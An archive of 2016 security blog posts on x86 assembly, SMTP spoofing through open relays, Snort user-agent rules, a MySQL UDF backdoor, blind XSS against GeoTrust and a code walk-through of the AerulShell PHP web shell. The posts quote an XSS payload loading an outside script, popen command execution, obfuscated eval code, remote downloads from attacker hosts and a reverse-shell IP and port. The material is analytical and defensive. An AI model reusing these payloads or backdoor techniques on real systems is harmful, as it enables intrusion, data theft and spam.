## Saturday, September 24, 2016

### Intel Assembly Basics: movl, cmpl, jns

Intel Assembly Basics

Here's a simple code block, what does it do?

0x080483c1 <+6>: movl $0x15,-0x4(%ebp)
0x080483c8 <+13>: cmpl $0x0,-0x4(%ebp)
0x080483cc <+17>: jns 0x80483d5
0x080483ce <+19>: movl $0xf,-0x4(%ebp)
0x080483d5 <+26>: ...

movl is 'move long'; 'long' here means a 32-bit integer. Hex 0x15 is 16+5=21, so this stores 21 into the local variable that sits 4 bytes below the frame pointer, -0x4(%ebp), the first slot on the stack.

cmpl is 'compare long', so it compares two 32-bit integers: the immediate 0x0, which is simply 0, and the value at -0x4(%ebp), which from the previous line we know is 21. Compare determines whether the values are the same or different by subtracting them, 21 - 0; the result is thrown away but the flags it produces are kept. If the result of the subtraction is 0 it sets the Zero Flag (ZF) to 1 (true); if the result is anything else it sets ZF to 0 (false). Here 21-0=21, so ZF is 0 (false). The compare instruction also sets the Sign Flag (SF) to 1 if the result is negative and to 0 if it is positive. Here the result is +21, which is positive, so SF is set to 0.

jns is 'jump if not sign', i.e. jump if the Sign Flag (SF) is 0 (the previous compare result was not negative). In this case SF was set to 0, which means the result was positive (not signed), so it jumps to address 0x80483d5.

movl is 'move long' again, just like above, and this time it would store 15 (0xf) into the same stack slot, -0x4(%ebp). But in this case, since we jumped over it, this instruction never actually gets executed.

Thus, to wrap this all up, you could rewrite this code in pseudo C code as follows. The compare is against 0 and jns skips the store whenever the result is not negative, so the assignment only runs when x is negative:

int x = 21;
if (x < 0)
    x = 15;
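To make the flag logic concrete, here is an added Python example (not code from the post) that emulates what cmpl and jns do with the Zero Flag and Sign Flag on 32-bit values and steps through the four instructions above. The operand order of cmpl() follows AT&T syntax (source first, destination second) and the function names are mine. It also runs the block with a negative and a zero starting value, cases the post does not show, to make clear that a compare against 0 followed by jns is really a test of the sign of x.

```python
# Added example: emulate the ZF/SF behaviour of cmpl and the jns decision on
# 32-bit two's-complement values. Not code from the original post.
MASK32 = 0xFFFFFFFF


def to_i32(value):
    """Interpret a 32-bit pattern as a signed integer."""
    value &= MASK32
    return value - (1 << 32) if value & 0x80000000 else value


def cmpl(src, dst):
    """AT&T 'cmpl $src, dst' computes dst - src, discards the result and
    keeps the flags. Returns the Zero Flag and Sign Flag as 0/1."""
    result = (dst - src) & MASK32
    return {"ZF": int(result == 0), "SF": (result >> 31) & 1}


def run_block(initial_x):
    """Step through the post's four instructions with x at -0x4(%ebp).
    initial_x replaces the 0x15 of the first movl so other cases can be tried."""
    x = initial_x & MASK32            # movl $0x15,-0x4(%ebp)  (value parameterised here)
    flags = cmpl(0x0, x)              # cmpl $0x0,-0x4(%ebp)   -> x - 0, flags only
    jump_taken = flags["SF"] == 0     # jns 0x80483d5          -> skip when not negative
    if not jump_taken:
        x = 0xF                       # movl $0xf,-0x4(%ebp)   -> only on fall-through
    return {"x": to_i32(x), "jump_taken": jump_taken,
            "ZF": flags["ZF"], "SF": flags["SF"]}


if __name__ == "__main__":
    for start in (0x15, 0, -5):
        print(f"x = {start:>3}: {run_block(start)}")
```

jns consults SF alone. The signed conditions jl/jge combine SF with the Overflow Flag, which is why a compiler can get away with jns here: subtracting 0 can never overflow, so SF by itself tells you whether x is negative.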

Top Blogs of all-time

Top Github Contributions

Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

### Intel Assembly Basics: GCC and GDB Disassembly

Intel Assembly Basics

I want to write a C program in linux and see what X86 assembly it generates. Let's try this.

nano increment.c

int main(){
    int x = 15;
    x++;
}

gcc -mpreferred-stack-boundary=2 -ggdb increment.c -o increment

gdb ~/increment

(gdb) disas main

Dump of assembler code for function main:
0x080483bb <+0>: push %ebp
0x080483bc <+1>: mov %esp,%ebp
0x080483be <+3>: sub $0x4,%esp
0x080483c1 <+6>: movl $0xf,-0x4(%ebp)
0x080483cc <+17>: mov \$0x0,%eax
0x080483d1 <+22>: leave
0x080483d2 <+23>: ret
End of assembler dump.


## Friday, September 16, 2016

### Sending SMTP Emails

This Kali tutorial on SMTP hacking gives a simple walk-through.

If you find a vulnerable SMTP server that does not require authentication you can telnet or netcat to it on port 25.

First greet the server with HELO thedomain.com

Next start a message with the sender MAIL FROM: sendingvictim@thedomain.com

And set the recipient RCPT TO: spamvictim@somewhere.com

And start the body by typing DATA

Enter the subject with SUBJECT: my subject

Then type in the body of the email you want

Then type . and hit <ENTER> to send the email

Then get out of there with QUIT
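What decides whether the session above actually delivers anything is the server's relay policy. As an added example (mine, not from the post or the Kali tutorial), here is a toy server-side handler for exactly the commands in the walk-through, run once as an open relay and once with relaying restricted to the server's own domains. The reply codes are the standard SMTP ones; the host name, the local-domain list and the session transcript are constructed, and EHLO/AUTH are deliberately left out.

```python
# Added example: minimal SMTP command handler showing why an open relay accepts
# the walk-through's message and a correctly configured server does not.
# Not code from the original post. Host and domains are constructed.
LOCAL_DOMAINS = {"thedomain.com"}        # domains this server delivers for


def smtp_session(client_lines, open_relay):
    """Feed the client's lines to the handler; return (server replies, accepted)."""
    replies = ["220 mail.thedomain.com ESMTP ready"]     # banner
    in_data, accepted, rcpt_ok = False, False, False
    for line in client_lines:
        if in_data:                                       # message body until a lone "."
            if line == ".":
                in_data = False
                accepted = True
                replies.append("250 2.0.0 OK: queued")
            continue
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb == "HELO":
            replies.append("250 mail.thedomain.com")
        elif verb == "MAIL":
            replies.append("250 2.1.0 OK")
        elif verb == "RCPT":
            domain = arg.rsplit("@", 1)[-1].rstrip(">").lower()
            if open_relay or domain in LOCAL_DOMAINS:
                rcpt_ok = True
                replies.append("250 2.1.5 OK")
            else:                                         # the hardened behaviour
                replies.append("554 5.7.1 Relay access denied")
        elif verb == "DATA":
            if rcpt_ok:
                in_data = True
                replies.append("354 End data with <CR><LF>.<CR><LF>")
            else:
                replies.append("554 5.5.1 Error: no valid recipients")
        elif verb == "QUIT":
            replies.append("221 2.0.0 Bye")
        else:
            replies.append("500 5.5.2 Error: command not recognized")
    return replies, accepted


# Constructed transcript of the client side of the walk-through above.
SESSION = [
    "HELO thedomain.com",
    "MAIL FROM: sendingvictim@thedomain.com",
    "RCPT TO: spamvictim@somewhere.com",
    "DATA",
    "Subject: my subject",
    "",
    "body of the email",
    ".",
    "QUIT",
]

if __name__ == "__main__":
    for mode in (True, False):
        replies, accepted = smtp_session(SESSION, open_relay=mode)
        print(f"open_relay={mode}: accepted={accepted}")
        for r in replies:
            print("  S:", r)
```

The only difference between the two runs is the RCPT TO decision: with relaying restricted, a recipient outside LOCAL_DOMAINS gets 554 and the later DATA is refused, so the spam never enters the queue. Real MTAs make the same decision per recipient, normally also allowing authenticated or trusted-network clients to relay.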


### Snort Rules Monitoring User-Agents

I think some Snort rules like these could be used to monitor for specific user-agents that are often associated with recon, vulnerability scans, and exploits.

WPScan

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (sid:xxx; gid:1; flow:established,to_server; content:"WPScan"; http_header; fast_pattern:only; pcre:"/^User\x2dAgent\x3a\x20[^\r\n]*WPScan/Hm"; metadata:service http; msg:"BLACKLIST User-Agent known malicious user-agent string WPScan - vulnerability scanner"; classtype:network-scan; rev:1; )

Wget

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (sid:xxx; gid:1; flow:established,to_server; content:"Wget"; http_header; fast_pattern:only; pcre:"/^User\x2dAgent\x3a\x20Wget/Hm"; metadata:service http; msg:"BLACKLIST User-Agent known malicious user-agent string Wget non-browser"; classtype:network-scan; rev:1; )

Synapse

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (sid:xxx; gid:1; flow:established,to_server; content:"Synapse"; http_header; fast_pattern:only; pcre:"/^User\x2dAgent\x3a\x20[^\r\n]*Synapse/Hm"; metadata:service http; reference:url,http://www.spambotsecurity.com/forum/viewtopic.php?f=43&t=2876; msg:"BLACKLIST User-Agent known malicious user-agent string Synapse - SQLi IoC"; classtype:network-scan; rev:1; )

SqlMap

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (sid:xxx; gid:1; flow:established,to_server; content:"sqlmap"; http_header; fast_pattern:only; pcre:"/^User\x2dAgent\x3a\x20[^\r\n]*sqlmap/Hm"; metadata:service http; reference:url,http://sqlmap.org/; msg:"BLACKLIST User-Agent known malicious user-agent string sqlmap - vulnerability scanner"; classtype:network-scan; rev:1; )

Python

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (sid:xxx; gid:1; flow:established,to_server; content:"Python-urllib"; http_header; fast_pattern:only; pcre:"/^User\x2dAgent\x3a\x20Python/Hm"; metadata:service http; msg:"BLACKLIST User-Agent known malicious user-agent string Python non-browser"; classtype:network-scan; rev:3; )

PycURL

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (sid:xxx; gid:1; flow:established,to_server; content:"PycURL"; http_header; fast_pattern:only; pcre:"/^User\x2dAgent\x3a\x20[^\r\n]*PycURL/Hm"; metadata:service http; reference:url,http://pycurl.io/; msg:"BLACKLIST User-Agent known malicious user-agent string PycURL - non Browser"; classtype:network-scan; rev:1; )

Paros

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (sid:xxx; gid:1; flow:established,to_server; content:"Paros"; http_header; fast_pattern:only; pcre:"/^User\x2dAgent\x3a\x20[^\r\n]*Paros/Hm"; metadata:service http; reference:url,http://sectools.org/tool/paros/; msg:"BLACKLIST User-Agent known malicious user-agent string Paros - vulnerability scanner"; classtype:network-scan; rev:1; )

OpenVAS

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (sid:xxx; gid:1; flow:established,to_server; content:"OpenVAS"; http_header; fast_pattern:only; pcre:"/^User\x2dAgent\x3a\x20[^\r\n]*OpenVAS/Hm"; metadata:service http; reference:url,http://www.openvas.org/; msg:"BLACKLIST User-Agent known malicious user-agent string OpenVAS - vulnerability scanner"; classtype:network-scan; rev:2; )

Nmap

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (sid:xxx; gid:1; flow:established,to_server; content:"Nmap"; http_header; fast_pattern:only; pcre:"/^User\x2dAgent\x3a\x20[^\r\n]*Nmap/Hm"; metadata:service http; reference:url,https://nmap.org/book/nse.html; msg:"BLACKLIST User-Agent known malicious user-agent string Nmap - scanner"; classtype:network-scan; rev:2; )

Nikto

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (sid:xxx; gid:1; flow:established,to_server; content:"Nikto"; http_header; fast_pattern:only; pcre:"/^User\x2dAgent\x3a\x20[^\r\n]*Nikto/Hm"; metadata:service http; reference:url,http://sectools.org/tool/nikto/; msg:"BLACKLIST User-Agent known malicious user-agent string Nikto - vulnerability scanner"; classtype:network-scan; rev:1; )

Kazehakase

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (sid:xxx; gid:1; flow:established,to_server; content:"Kazehakase"; http_header; fast_pattern:only; pcre:"/^User\x2dAgent\x3a\x20[^\r\n]*Kazehakase/Hm"; metadata:service http; reference:url,https://en.wikipedia.org/wiki/Kazehakase; msg:"BLACKLIST User-Agent known malicious user-agent string Kazehakase - suspicious browser"; classtype:network-scan; rev:1; )

curl

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (sid:xxx; gid:1; flow:established,to_server; content:"curl"; http_header; fast_pattern:only; pcre:"/^User\x2dAgent\x3a\x20[^\r\n]*curl/Hm"; metadata:service http; msg:"BLACKLIST User-Agent known malicious user-agent string curl - non browser"; classtype:network-scan; rev:1; )
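To see what these rules actually match, here is an added Python example, not code from the post or from Snort, that re-implements the content: and pcre: tests of seven of the rules above and runs them over constructed HTTP requests. The request builder, the sample user-agent strings and the approximation of Snort's http_header buffer are my assumptions; the patterns are copied from the rules. The samples include the edge cases a rule writer should know about: content matching is case-sensitive without nocase, the Wget and Python pcre patterns are anchored to the start of the user-agent value, and the Python rule's content:"Python-urllib" gates its pcre, so a Python-requests client is not caught.

```python
import re

# Added example: the detection logic of the Snort rules above, re-expressed in
# Python and run over constructed requests. Not the blog's own code.
# Each entry: (msg fragment, content:"..." string, pcre pattern).
RULES = [
    ("WPScan - vulnerability scanner", "WPScan",        r"^User\x2dAgent\x3a\x20[^\r\n]*WPScan"),
    ("Wget non-browser",               "Wget",          r"^User\x2dAgent\x3a\x20Wget"),
    ("sqlmap - vulnerability scanner", "sqlmap",        r"^User\x2dAgent\x3a\x20[^\r\n]*sqlmap"),
    ("Python non-browser",             "Python-urllib", r"^User\x2dAgent\x3a\x20Python"),
    ("Nmap - scanner",                 "Nmap",          r"^User\x2dAgent\x3a\x20[^\r\n]*Nmap"),
    ("Nikto - vulnerability scanner",  "Nikto",         r"^User\x2dAgent\x3a\x20[^\r\n]*Nikto"),
    ("curl - non browser",             "curl",          r"^User\x2dAgent\x3a\x20[^\r\n]*curl"),
]
# Snort's /m modifier corresponds to re.MULTILINE: ^ anchors at every header line.
COMPILED = [(msg, content, re.compile(pcre, re.MULTILINE)) for msg, content, pcre in RULES]


def header_block(raw_request):
    """Approximate the http_header buffer: the header lines after the request
    line, up to the blank line that ends the headers (assumption)."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    return "\r\n".join(head.split("\r\n")[1:])


def match_user_agent(raw_request):
    """Return the msg of the first rule that fires, or None. Every option in a
    Snort rule must match, so the content: substring (case-sensitive: none of
    these rules use nocase) AND the pcre: must both hit."""
    headers = header_block(raw_request)
    for msg, content, rx in COMPILED:
        if content in headers and rx.search(headers):
            return msg
    return None


def build_request(user_agent, path="/"):
    """Constructed sample request; not captured traffic."""
    return (f"GET {path} HTTP/1.1\r\nHost: www.example.invalid\r\n"
            f"User-Agent: {user_agent}\r\nAccept: */*\r\n\r\n")


# Constructed user-agent strings chosen to exercise the rules' edge cases.
SAMPLES = {
    "wpscan":          "WPScan v3.4.0 (https://wpscan.org/)",
    "python_urllib":   "Python-urllib/3.8",
    "python_requests": "Python-requests/2.25.1",   # pcre would hit, content: does not
    "nse":             "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)",
    "wget_prefixed":   "Mozilla/5.0 Wget/1.20",    # content: hits, anchored pcre does not
    "curl_upper":      "CURL/7.64.0",              # case-sensitive content: misses
    "curl":            "curl/7.64.0",
    "browser":         "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/90.0",
}


def triage(samples=SAMPLES):
    """Map each sample name to the rule message it would trigger (None if none)."""
    return {name: match_user_agent(build_request(ua)) for name, ua in samples.items()}


if __name__ == "__main__":
    for name, verdict in triage().items():
        print(f"{name:<16} -> {verdict}")
```

Before loading rules like these, replace sid:xxx with a real, unique SID (local rules conventionally use 1000000 and above) and decide per rule whether you want nocase. All of these tools let the operator set an arbitrary user-agent, so treat a hit as a cheap lead for the analyst, not as proof that a scan happened or that its absence means none did.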


### MySQL Backdoors in UDFs

Thought this blog by securusglobal about a MySQL backdoor using a UDF was interesting. In short, a UDF is a user-defined function in MySQL. In general you use it to manipulate column values, for example in a select statement, without having to put the dirty non-MySQL logic (such as C/C++) inside the actual select statement. Example: select udf_tocelsius(temps.fahrenheit) from temps

But instead of doing something nice like a formula or calculation, as a bad guy you could perhaps do something like

char *cmd;
FILE *fp;
strcat(cmd, args->args[i]);
fp = popen(cmd, "r");

Which is C code that essentially runs system commands against the operating system (similar to the system() function), so you could pass in commands that download your malware, execute it, etc.

Please note this is not a vulnerability; it is more of an example of a backdoor persistence method. Of course a lot of things have to be set up correctly for this to even work: for example, if the attacker didn't have appropriate access, or permissions were locked down tight, this might never work. But interesting nonetheless.


### SIEM Implementation (Security Incident and Event Management)

Just thought I'd throw together some items that I've experienced as being critical to the implementation and long-term success of a SIEM.

1.) Staff to manage the Infrastructure (uptime, performance, storage, upgrades)
2.) Staff to administer the SIEM (rule/alert tuning and creation, log sources collection and monitoring)
3.) Staff to monitor and analyze the alerts (ensure you have enough to manage the queue quickly and hit all SLAs)
4.) System Resources (Enough hardware, licenses, etc. so you don't drop logs, and can correlate events quickly, etc.)
5.) Custom Alerts for your Environment (disable most of the defaults, write the rules specific to what should or shouldn't happen in your company)
6.) Constant Tuning of existing Alerts (to ensure analysts are only working on useful alerts and not noisy junk)
8.) Add accurate and relevant Intel (don't blindly take free feeds, make sure the intel you gather is accurate and relevant to your environment)
9.) Log Sources Processes (ensure processes exist so whenever a new device, server, or app is brought up it doesn't go-live until you're getting logs)
10.) Document all alerts (generate a history for devices, servers, users, ips, urls, etc. so that analysts have context and don't have to re-invent the wheel)
11.) Data Classification (analysts must know what your sensitive data is and where it resides so they know what they're protecting and know when to raise red flags)
12.) Management support (you need managers that show interest and concern for things like alert queues, SLAs, false positive rates, etc. to drive improvement)

It's a lot, but if you have those things it would seem that a SIEM can be a valuable tool in your layered Security!


### SiteCore Security Hardening

Thought this security hardening article by Rackspace was useful for those supporting SiteCore environments. To quickly summarize

3. Secure the file upload functionality (e.g. disable execute permissions, apply a strong and strict filter, etc.)
4. Improve the security of the website folder (e.g. move non-web folders like data and indexes out of the web root)
5. Increase login security (e.g. enable HTTPS and disable auto-complete)
7. Protect PhantomJS (e.g. get rid of this tool, it's generally not needed but could be used against you)
8. Protect media requests (e.g. only allow server generated requests to be processed on images)
9. Remove header information from responses sent by your website (e.g. remove response headers to prevent information leakage)


### Chrome to Mark HTTP as Insecure

It's exciting to see that Google Chrome will start marking HTTP login pages as insecure in January 2017.

To help users browse the web safely, Chrome indicates connection security with an icon in the address bar. Historically, Chrome has not explicitly labelled HTTP connections as non-secure. Beginning in January 2017 (Chrome 56), we’ll mark HTTP sites that transmit passwords or credit cards as non-secure, as part of a long-term plan to mark all HTTP sites as non-secure.

So I did a quick before & after to show you what it looks like. You can try this yourself by going to chrome://flags and changing "mark non-secure origins as non-secure" from Default to "mark non-secure origins as non-secure"

BEFORE you made that change an HTTP login page would look like this

AFTER you made that change an HTTP login page would look like this (notice the little red exclamation mark next to the url)

And if you were to click into the red exclamation marks to see the details it says

Why is this a good thing? Because HTTPS does multiple things for you that are critical on the internet. The obvious one is encryption, so your passwords are encrypted and not sent over the internet in plain text. But I've also blogged about how HTTPS gives you more than just encryption: authenticity, integrity, 3rd-party vetting, revocation and more. If you're surfing the internet over HTTP you can't trust it at all, even if it's just a plain website. Why? There could be a man-in-the-middle monitoring your traffic, serving up and injecting code and malware, and you wouldn't even know it.


### Blind Cross-site Scripting (BXSS)

Matthew Bryant (@IAmMandatory) wrote a great blog post a bit ago Breaching a CA – Blind Cross-site Scripting (BXSS) in the GeoTrust SSL Operations Panel Using XSS Hunter. It has a pretty cool concept of BXSS (Blind XSS) ( or Blind Cross Site Scripting).

What is XSS?

XSS (or Cross Site Scripting) is a vulnerability in a website where you can inject Javascript code into a user input parameter (perhaps the url, query string, cookie, textbox, etc.) and because the developer did not properly validate the user input, when the HTTP response is returned and the web page is displayed by your browser, the browser mistakenly runs your user-inputted javascript. Why is this a problem? If a malicious actor can get you to click on a link and run their javascript in your browser, they can potentially compromise your browser, credentials, or even your entire system. They can inject key loggers, malware, etc. Bad Stuff.

What is BXSS?

With XSS as defined above you get that immediate feedback. With BXSS you don't! I have written about BXSS once before. In short, you submit some malicious XSS user input somewhere, but the intent is not to exploit the system you're inputting the data into. Instead you're hoping to exploit and run JavaScript on a different system that also handles that same data, likely at a later date. Great examples of this are websites that allow you to rate products and leave comments. If you were to inject a payload into that comment textbox, one example of BXSS would be that, when the product review person views your review on their internal intranet website from their cubicle, the XSS code executes on that local intranet site. Thus as the attacker you're blind: you submitted the XSS payload on the website's product page, but you don't see the results, you don't get immediate feedback, and you won't know if it worked until a few hours or days later when that product review specialist opens up your comments and attempts to moderate (approve/disapprove) them.

More from Matthew's blog

Matthew used the tool XSS Hunter which allows you to submit XSS attacks and it gives you detailed information about if the attack was successful or not, including things like screenshots of the webpage, the html code that displayed on the web page, etc. Perfect for BXSS because even though you couldn't technically see the exploit running, XSS Hunter gives you all the details as if you did.

It's an interesting concept too that Matthew mentions "In the world of blind payload testing, context is everything. You may only trigger the vulnerability a single time so you must have as much information as possible if you want to get it fixed." Basically the moderator may only ever moderate or review your comment once. Thus your first payload can't be an alert(1) test! Your first payload has to be the real-deal and it has to work the first time!

To explain Matthew's GeoTrust attack here's a short summary "during my testing I found an unintended vulnerability in GeoTrust’s Operations Panel when a support agent viewed my certificate request information. I woke up one morning with an XSS Hunter payload fire email titled [XSSHunter] XSS Payload Fired On https://ops.geotrust.com/opsdashboard/com.geotrust.presentation.app.ops.services.cancelagedorders.CancelAgedOrders/CancelAgedOrders.jsp in my inbox"

XSS Hunter showed him this code, and notice that the data[i].Customer is concatenated and ends up being displayed as html without any validation or sanitization.

for(i = 0; i < count; i++){
    table = table + "<tr><td>" + data[i].ID + "</td><td>" + data[i].Product + "</td><td>" + data[i].Customer + "</td><td>" + (data[i]).Date + "</td><td>" + data[i].State + "</td></tr>";
}

So all Matthew had to do was inject the Customer field with this value

"><script src=https://y.vg></script>

And the internal support agent on the intranet in his cubicle will suddenly load Matthew's evil XSS Hunter url (https://y.vg), and that url will download keyloggers, screenshot takers, or whatever other mayhem the attacker would like to inflict. The rendered row ends up looking like this:

<tr><td>13785664</td><td>GeoTrust SSL Trial</td><td>"><script src="https://y.vg"></script></td><td>06/06/2016 05:40:04</td><td>Waiting for Whois Approval</td></tr>

To protect against XSS and BXSS you need to perform input validation on all user input. Remember, user input can come from anywhere! Recall my blog post about What is the 'input' in input validation? In this case you can't forget that even the values in an SSL certificate request, such as Customer, should be considered user input, thus untrusted, and thus in need of sanitizing. To sanitize you would ideally set up a regex that whitelists allowed characters / format, and you would use a standard XSS prevention library to strip out or encode malicious characters.
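As an added example (mine, not the post's and not GeoTrust's code), here is the row-building loop above ported to Python next to an output-encoded version and an allowlist check for the Customer field, i.e. the two defences the paragraph above describes: validate on input, encode on output. The allowlist regex is an assumption about what a customer name may contain; the ID, date and state values are the ones shown in the post, with a second constructed row for contrast.

```python
import html
import re

# Added example: the vulnerable concatenation pattern next to its encoded
# form plus an input allowlist. Not code from the post or from GeoTrust.
PAYLOAD = '"><script src=https://y.vg></script>'   # the value quoted in the post
COLUMNS = ("ID", "Product", "Customer", "Date", "State")


def render_rows_unsafe(rows):
    """Mirror of the vulnerable loop: raw concatenation of untrusted values into HTML."""
    table = ""
    for r in rows:
        table += ("<tr><td>" + r["ID"] + "</td><td>" + r["Product"] + "</td><td>"
                  + r["Customer"] + "</td><td>" + r["Date"] + "</td><td>"
                  + r["State"] + "</td></tr>")
    return table


def render_rows_escaped(rows):
    """Same table, but every cell is HTML-entity encoded before insertion,
    so '<', '>', '&' and quotes can never start markup."""
    table = ""
    for r in rows:
        cells = "".join("<td>" + html.escape(str(r[c]), quote=True) + "</td>" for c in COLUMNS)
        table += "<tr>" + cells + "</tr>"
    return table


# Assumed allowlist for an organisation name; tighten it to your own data.
CUSTOMER_OK = re.compile(r"^[A-Za-z0-9 .,&'()-]{1,100}$")


def is_valid_customer(value):
    """Input validation: accept only the characters a customer name may contain."""
    return CUSTOMER_OK.match(value) is not None


def has_live_script(markup):
    """Crude check: does a real <script tag survive into the markup?"""
    return "<script" in markup


# Constructed sample rows; the first Customer value is the post's payload.
SAMPLE_ROWS = [
    {"ID": "13785664", "Product": "GeoTrust SSL Trial", "Customer": PAYLOAD,
     "Date": "06/06/2016 05:40:04", "State": "Waiting for Whois Approval"},
    {"ID": "13785665", "Product": "GeoTrust SSL Trial", "Customer": "Example Corp.",
     "Date": "06/06/2016 05:41:10", "State": "Issued"},
]

if __name__ == "__main__":
    print("unsafe :", render_rows_unsafe(SAMPLE_ROWS))
    print("escaped:", render_rows_escaped(SAMPLE_ROWS))
    for row in SAMPLE_ROWS:
        print(repr(row["Customer"]), "valid:", is_valid_customer(row["Customer"]))
```

Both layers matter: the allowlist rejects the payload at submission time, and the output encoding means that even a value that slipped past validation (or came from another system, as in the BXSS case) is rendered as text rather than parsed as a tag.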


## Friday, September 2, 2016

### Intel Assembly Basics: Segment Registers

Intel Assembly Basics

6 16-bit segment registers

1.) CS #code segment
2.) DS #data segment
3.) SS #stack segment
4.) ES #extra segment
5.) FS #general purpose segment
6.) GS #general purpose segment

Each holds the base address of a segment; memory in that segment is then accessed as an offset from the base. Example:

mov DS:[eax], ebx

Moves the data in ebx into memory in the Data Segment ... but where? The base address of the data segment plus the value in eax gives you the final address.


### Intel Assembly Basics: EIP Register

Intel Assembly Basics

EIP # instruction pointer, points to next instruction, goal of most attacks is to control this


### Intel Assembly Basics: General Purpose Registers

Intel Assembly Basics

8 general purpose registers
1.) EAX #can also access hi/lo order 8 bits (AH/AL)
2.) EBX #can also access hi/lo order 8 bits (BH/BL)
3.) ECX #used by many string instructions as a counter, can also access hi/lo order 8 bits (CH/CL)
4.) EDX #can also access hi/lo order 8 bits (DH/DL)
5.) ESI #used by many string instructions as a source pointer, can also access lo order 16 bits (SI)
6.) EDI #used by many string instructions as a destination pointer, can also access lo order 16 bits (DI)
7.) EBP #used in many stack operations, generally contains an address (a wrong address there can crash the app), can also access lo order 16 bits (BP)
8.) ESP #can also access lo order 16 bits (SP)


### Intel Assembly Basics: Opcode & Shell Code

Intel Assembly Basics
return 0;

Could be represented by this

leave
xor eax, eax
ret

Which have these lower-level CPU opcodes

leave # 0xC9
xor eax, eax # 0x31, 0xC0
ret # 0xC3

Which means if you wanted to create a shellcode of the 'return 0' statement in C you'd do the following.

unsigned char shellcode[] = "\xc9\x31\xc0\xc3";


### Intel Assembly Basics: return 0;

Intel Assembly Basics
return 0;

Could be represented by this

leave # destroys the stack frame
xor eax, eax # sets eax to 0 (XOR is 1 only where the two bits differ, so a value XORed with itself is all zeros; this is faster than moving a literal 0 into the register)
ret # returns control back to the calling program


## Thursday, September 1, 2016

### AerulShell Web Shell Code Walk-Through

This paste of AerulShell v.4 appears to be a PHP web shell that an attacker can upload to get backdoor access, letting them compromise and manage your web server without you knowing it.

It's got some interesting features/pieces.

For authentication it requires that the parameter 'x' posted to the url has an md5 hash of c2b72f86b8ca51642c4a902887830d3e.

$auth_pass = "c2b72f86b8ca51642c4a902887830d3e";
if( ... ( md5($_POST['x']) == $auth_pass ) ) )
{ $_SESSION[md5($_SERVER['HTTP_HOST'])] = true; }

If you look that hash up on an md5 reverse-lookup site like this one, you see that the password is aerulcyber, so you could log in to it with something like www.hackedsite.com/evilpage.php?x=aerulcyber

Also, if there is a login failure, it sends an email to the 'Boss' at root@aerulcyber.biz. How do I know this? If there is a login failure it calls PrintLogin(), which is deceptively named, as it actually has some obfuscated code of its own.

...
$shell_data = "JHZpc2l0Y291bn...;
eval(base64_decode($shell_data));

Which if deobfuscated actually sets a cookie on your browser, counts how many times you've been there, and sends an email with your ip address to the Boss.

...
...
$body = "Boss, there was an injected target on $target by $visitor";
@mail("root@aerulcyber.biz","http://$target $system by $visitor", "$body");

Also, if you were to navigate to this page without the 'x' parameter, it deceptively looks like an HTTP 404 page not found. But you should notice a textbox and submit button at the bottom. If you enter the password mentioned above into the textbox and hit submit, it logs you into the web shell console.

<html>
...
<title>
</title>
...
<form method=post>
</form>

if(isset($_GET['dl']) && ($_GET['dl'] != "")){
$file = $_GET['dl'];
$filez = @file_get_contents($file);
...echo $filez;

You could delete a file

if(isset($_GET['delete']) && ($_GET['delete'] != ""))

You could make a folder

elseif(isset($_GET['mkdir']) && ($_GET['mkdir'] != ""))
$path = $pwd.$_GET['mkdir']; @mkdir($path);

You could get a shell and post commands to it

elseif(isset($_GET['x']) && ($_GET['x'] == 'shell'))
<form action="?y=<?php echo $pwd; ?>&amp;x=shell" method="post">
<table class="cmdbox">
<tr>
<td colspan="2">
<textarea class="output" readonly> <?php if(isset($_POST['submitcmd'])) { echo @exe($_POST['cmd']); } ?> </textarea>

There's also attempts to download exploits , run them, and elevate you to root

$pilih = $_POST['pilih'];
if ( $pilih == 'autoroot1') {
mkdir('auto',0777);
$file = file_get_contents('http://svchost.nazuka.net/a.txt');
$IIIIIIIIl11I = fopen('auto/auto.pl','w');
chmod("auto/auto.pl",0777);
fwrite($IIIIIIIIl11I,$file);
fclose($IIIIIIIIl11I);
print 'autoroot telah diluncurkan Boss....

There are also additional "bonus tools" that the shell will download and execute , basically stripping text off pastebin.

$file = file_get_contents('http://pastebin.com/raw.php?i=gtTLMyya');
$IIIIIIIIl11I = fopen('meter.php','w');

$file = file_get_contents('http://pastebin.com/raw.php?i=ctQsPjpn');
$IIIIIIIIl11I = fopen('wy.php','w');

$file = file_get_contents('http://pastebin.com/raw.php?i=mGSK1EEa');
$IIIIIIIIl11I = fopen('back.php','w');

$file = file_get_contents('http://pastebin.com/raw.php?i=aBHs2nWR');
$IIIIIIIIl11I = fopen('back.pl','w');

You can pull up a reverse shell back to these IP addresses; it even gives the attacker friendly hints/reminders on how to use it.

+--=[ Backconnect Reverse Shell ]=--+
...
Choose Backconnect Command
...
<form method="post" action="">&
...
<option value="back1" > Perl Backconnect </option>
<option value="back2"> Php Backconnect </option>
<option value="back3"> Weevely </option>
<option value="back4"> Php Metasploit </option>
...
my $ip = '222.255.167.45';
my $port = '57899';
...
$ip = '222.255.167.45';
$port = 57899;
...
my $ip = '222.255.167.45';
my $port = '57899';
...
$ip = '222.255.167.45';
$port = 57899;
...
usage : nc -lvvp 57899

You can upload a file to the hacked web server with a tool of your choice

...
<option value="wwget">wget</option>
<option value="wlynx">lynx</option>
<option value="wfetch">fetch</optoion>
<option value="wget">GET</option>
<option value="wcurl">curl</option>

You can deface the site and tell them why you did it

elseif(isset($_GET['x']) && ($_GET['x'] == 'zone-h')){?>

<input class="inputz" type="text" name="defacer" size="67" value="Aerul Da White-Hkc" /><br> <select class="inputz" name="hackmode">
